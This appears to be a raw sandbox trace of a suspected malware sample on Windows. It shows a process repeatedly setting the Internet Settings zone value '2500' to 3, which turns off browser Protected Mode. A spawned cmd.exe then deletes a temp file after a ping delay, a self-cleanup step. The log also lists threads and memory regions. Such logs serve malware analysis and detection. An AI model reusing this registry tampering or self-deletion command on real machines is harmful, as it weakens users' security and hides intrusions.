	[0119.898] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.898] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.898] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.898] RegCloseKey (hKey=0x698) returned 0x0
	[0119.898] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.898] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.898] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.899] RegCloseKey (hKey=0x698) returned 0x0
	[0119.899] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.899] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.899] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.899] RegCloseKey (hKey=0x698) returned 0x0
	[0119.899] Sleep (dwMilliseconds=0x3e8) 
	[0119.902] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.902] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.902] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.903] RegCloseKey (hKey=0x698) returned 0x0
	[0119.903] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.903] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.903] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.903] RegCloseKey (hKey=0x698) returned 0x0
	[0119.903] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.903] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.903] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.903] RegCloseKey (hKey=0x698) returned 0x0
	[0119.903] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.903] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.903] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.903] RegCloseKey (hKey=0x698) returned 0x0
	[0119.903] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.903] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.903] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.904] RegCloseKey (hKey=0x698) returned 0x0
	[0119.904] Sleep (dwMilliseconds=0x3e8) 
	[0119.905] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.905] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.907] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.907] RegCloseKey (hKey=0x698) returned 0x0
	[0119.907] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.907] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.907] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.907] RegCloseKey (hKey=0x698) returned 0x0
	[0119.907] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.907] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.907] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.907] RegCloseKey (hKey=0x698) returned 0x0
	[0119.907] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.907] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.907] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.907] RegCloseKey (hKey=0x698) returned 0x0
	[0119.907] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.907] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.907] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.908] RegCloseKey (hKey=0x698) returned 0x0
	[0119.908] Sleep (dwMilliseconds=0x3e8) 
	[0119.909] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.909] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.909] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.909] RegCloseKey (hKey=0x698) returned 0x0
	[0119.909] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.909] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.909] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.909] RegCloseKey (hKey=0x698) returned 0x0
	[0119.910] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.910] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.910] RegCloseKey (hKey=0x698) returned 0x0
	[0119.910] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.910] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.910] RegCloseKey (hKey=0x698) returned 0x0
	[0119.910] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.910] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.910] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.910] RegCloseKey (hKey=0x698) returned 0x0
	[0119.910] Sleep (dwMilliseconds=0x3e8) 
	[0119.912] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.912] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.912] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.912] RegCloseKey (hKey=0x698) returned 0x0
	[0119.912] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.912] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.912] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.912] RegCloseKey (hKey=0x698) returned 0x0
	[0119.912] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.912] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.912] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.912] RegCloseKey (hKey=0x698) returned 0x0
	[0119.912] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.912] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.913] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.913] RegCloseKey (hKey=0x698) returned 0x0
	[0119.913] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.913] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.913] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.913] RegCloseKey (hKey=0x698) returned 0x0
	[0119.913] Sleep (dwMilliseconds=0x3e8) 
	[0119.932] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.932] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.932] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.932] RegCloseKey (hKey=0x698) returned 0x0
	[0119.932] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.932] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.933] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.933] RegCloseKey (hKey=0x698) returned 0x0
	[0119.933] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.933] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.933] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.933] RegCloseKey (hKey=0x698) returned 0x0
	[0119.933] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.933] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.933] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.933] RegCloseKey (hKey=0x698) returned 0x0
	[0119.933] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0119.934] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.934] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.934] RegCloseKey (hKey=0x698) returned 0x0
	[0119.934] Sleep (dwMilliseconds=0x3e8) 
	[0119.935] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0119.935] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.935] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.935] RegCloseKey (hKey=0x698) returned 0x0
	[0119.935] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0119.935] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.935] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.935] RegCloseKey (hKey=0x698) returned 0x0
	[0119.936] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0119.936] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.936] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.936] RegCloseKey (hKey=0x698) returned 0x0
	[0119.936] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0119.936] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x698) returned 0x0
	[0119.936] RegSetValueExA (in: hKey=0x698, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0119.936] RegCloseKey (hKey=0x698) returned 0x0

Thread:
	id = 120
	os_tid = 0xec0


Thread:
	id = 121
	os_tid = 0xf9c


Thread:
	id = 122
	os_tid = 0xfb4


Thread:
	id = 123
	os_tid = 0xaa8


Thread:
	id = 128
	os_tid = 0x4d0


Thread:
	id = 129
	os_tid = 0x8b8


Thread:
	id = 130
	os_tid = 0x7cc


Thread:
	id = 131
	os_tid = 0x624


Process:
	id = "11"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x59679000"
	os_pid = "0x30c"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "9"
	os_parent_pid = "0xe6c"
	cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /c ping localhost -n 4 & del /F /Q \"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\tmp8C77.tmp\" > nul"
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1939
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 1940
	        start_va = 0x30000
	          end_va = 0x44fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 1941
	        start_va = 0x50000
	          end_va = 0x8ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 1942
	        start_va = 0x90000
	          end_va = 0x18ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 1943
	        start_va = 0x190000
	          end_va = 0x193fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 1944
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 1945
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 1946
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 1947
	        start_va = 0xf40000
	          end_va = 0xf41fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000f40000"
	        filename = ""

Region:
	              id = 1948
	        start_va = 0x10b0000
	          end_va = 0x1101fff
	     entry_point = 0x10b0000
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 1949
	        start_va = 0x1110000
	          end_va = 0x510ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000001110000"
	        filename = ""

Region:
	              id = 1950
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 1951
	        start_va = 0x7f0c0000
	          end_va = 0x7f0e2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f0c0000"
	        filename = ""

Region:
	              id = 1952
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1953
	        start_va = 0x7fff0000
	          end_va = 0x7dfc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 1954
	        start_va = 0x7dfc15630000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007dfc15630000"
	        filename = ""

Region:
	              id = 1955
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
